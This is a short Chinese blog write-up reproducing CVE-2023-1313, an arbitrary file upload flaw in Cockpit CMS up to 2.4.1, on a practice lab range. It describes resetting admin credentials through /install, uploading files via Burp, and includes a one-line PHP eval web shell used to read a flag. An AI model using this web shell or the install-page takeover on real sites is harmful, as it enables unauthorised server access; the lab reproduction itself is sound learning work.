路漫漫其修远兮,吾将上下而求索

导航

< 2025年3月 >
23 24 25 26 27 28 1
2 3 4 5 6 7 8
9 10 11 12 13 14 15
16 17 18 19 20 21 22
23 24 25 26 27 28 29
30 31 1 2 3 4 5

统计

cockpit <=2.4.1 后台任意文件上传漏洞靶场复现(CVE-2023-1313)

cockpit在2.4.1版本之前存在任意文件上传漏洞PS:通过在浏览器中打开/install来运行安装

主页界面
image

使用admin/admin登录不了
image
根据提示访问/install后自动创建admin/admin,再次登录可以
image
image
image

找到一个上传点,上传phpinfo并burp抓包
image
image
具体路径可以在上传后有个下载按钮,会看到完整的访问路径(前面是有storage/uploads)
image
phpinfo界面,接着上传小马找到/flag
image
<?php @eval($_POST['1']);?>
image
image
image
/install/index.php中有个新增账号的操作,所以访问/install自动创建新账号
image

参考:
春秋云镜 CVE-2023-1313 WP-CSDN博客

posted on   爱在西元间  阅读(288)  评论(0编辑  收藏  举报

相关博文:
阅读排行:
· 震惊!C++程序真的从main开始吗?99%的程序员都答错了
· 别再用vector<bool>了!Google高级工程师:这可能是STL最大的设计失误
· 【硬核科普】Trae如何「偷看」你的代码?零基础破解AI编程运行原理
· 单元测试从入门到精通
· 上周热点回顾(3.3-3.9)
历史上的今天:
2020-08-06 常用docker命令收集
点击右上角即可分享
微信分享提示